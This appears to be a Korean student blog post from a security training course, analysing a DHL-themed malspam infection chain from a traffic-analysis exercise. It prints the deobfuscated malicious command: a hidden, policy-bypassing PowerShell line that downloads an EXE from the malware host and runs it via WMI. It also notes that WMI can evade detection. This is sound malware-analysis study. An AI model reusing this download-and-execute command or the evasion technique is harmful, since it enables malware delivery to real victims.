| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 |
Tags
- 악성코드 분석
- sk쉴더스 루키즈
- SK쉴더스루키즈
- 위상 정렬
- 예술의 전당
- 코리안챔버오케스트라
- webhacking
- 자바
- Practical Malware Analysis Labs
- 루키즈 31기
- 루키즈
- 진입차수
- 깃
- 레나튜토리얼
- 프리코스
- sk 쉴더스 루키즈 31기
- c
- 알고리즘
- 우아한테크코스
- 웹개발
- 서울청년문화패스
- sk 쉴더스 루키즈
- 백엔드
- 프랑스어 #프랑스어배우기 #프랑스어독학 #델프인강 #시원스쿨프랑스어 #delf독학 #델프 #프랑스어기초 #프랑스어공부
- React
- 루키즈31기
- linux
- 우테코
- 동적분석
- Dreamhack
Archives
- Today
- Total
yon11b
[SK 쉴더스 루키즈] Malware Traffic Analysis - INFECTION TRAFFIC FROM ITALIAN DHL-THEMED MALSPAM 문제 풀이 본문
보안/SK 쉴더스 루키즈
[SK 쉴더스 루키즈] Malware Traffic Analysis - INFECTION TRAFFIC FROM ITALIAN DHL-THEMED MALSPAM 문제 풀이
yon11b 2026. 6. 6. 03:49반응형
한 줄 정리: PowerShell을 통해 EXE를 다운로드하고 실행하는 시나리오
DHL 사칭 메일 수신
↓
메일 내 링크 클릭
↓
DHL-Express-Customer-Invoice.js 다운로드
↓
JS 다운로더 실행
↓
1차 악성코드 다운로드
↓
2차 악성코드(hero.exe) 다운로드
↓
랜섬웨어 실행
↓
파일 암호화

DHL 인데 메일송신주소가 yahoo이다.
저 링크를 클릭하면 js 파일이 받아졌다고 한다. 그런데 지금은 막혀서 js 파일을 그냥 따로 줬다.


함수 이름 개성 확실하네
eval, new Function으로 실행하는 부분을 주석처리하고 log로 찍어보자.


GqojTOkSJliyAgUR.ShellExecute("cMD.Exe", "/c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://winterforcing.info/get/get.php?yDokni','%temp%RNi25.eXe');
INvokE-WMiMeThod -Class WIN32_ProCESs -NAME CrEAtE -ArgUMEnTLiSt '%temp%RNi25.Exe'", "", "open", 0);
명령어 부분만 발췌
[첫번째 부분]
powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://winterforcing.info/get/get.php?yDokni','%temp%RNi25.eXe');
[두번째 부분]
INvokE-WMiMeThod -Class WIN32_ProCESs -NAME CrEAtE -ArgUMEnTLiSt '%temp%RNi25.Exe'
중간까지만 난독화 풀었는데도 알아볼 수 있을 정도이다.
[첫번째 부분]
http://winterforcing.info/get/get.php?yDokni에서 파일을 다운로드 하여 %temp%RNi25.eXe 로 저장하는 명령어이다.
[두번째 부분]
-Class WIN32_Process: WMI의 Win32_Process 클래스 사용
-Name Create: Win32_Process.Create() 메서드 호출
-ArgumentList '%temp%\\RNi25.eXe': 실행할 프로그램 경로 전달
결과 명령어: Win32_Process.Create("%temp%\\RNi25.eXe")
[종합 해석]
http://winterforcing.info/get/get.php?yDokni에서 파일을 다운로드 하여 %temp%RNi25.eXe 로 저장하고 WMI Win32_Process.Create로 실행하는 악성코드이다.
WMI이란?
Windows를 관리하기 위한 인터페이스
할 수 있는 요청들 예시
- 현재 실행 중인 프로세스 알려줘
- 서비스 상태 알려줘
- 프로그램 실행해줘(계산기 실행 명령어)
-
Invoke-WmiMethod ` -Class Win32_Process ` -Name Create ` -ArgumentList "calc.exe" - 컴퓨터 정보 알려줘
그냥 실행 안 하고 WMI를 쓰는 이유
- 원격 실행 가능
- 관리 기능 접근 가능
- 일부 탐지 우회 가능
728x90
'보안 > SK 쉴더스 루키즈' 카테고리의 다른 글
| [SK 쉴더스 루키즈] 보안관제 - Splunk 사용법 & vim에서 데이터 전처리 & Excel 피벗 테이블 (0) | 2026.06.11 |
|---|---|
| [SK 쉴더스 루키즈] AutoIt 스크립트 분석(Citadel 변종 증명) (0) | 2026.06.06 |
| [Malware Traffic Analysis] Email Roulette 문제 풀이 (0) | 2026.06.06 |
| [SK 쉴더스 루키즈] Practical Malware Analysis Lab 07-01 풀이 (0) | 2026.06.03 |
| [SK 쉴더스 루키즈] 고급 정적 분석 - IDA로 Practical Malware Analysis Labs 05-01.dll 분석하기 (0) | 2026.06.02 |
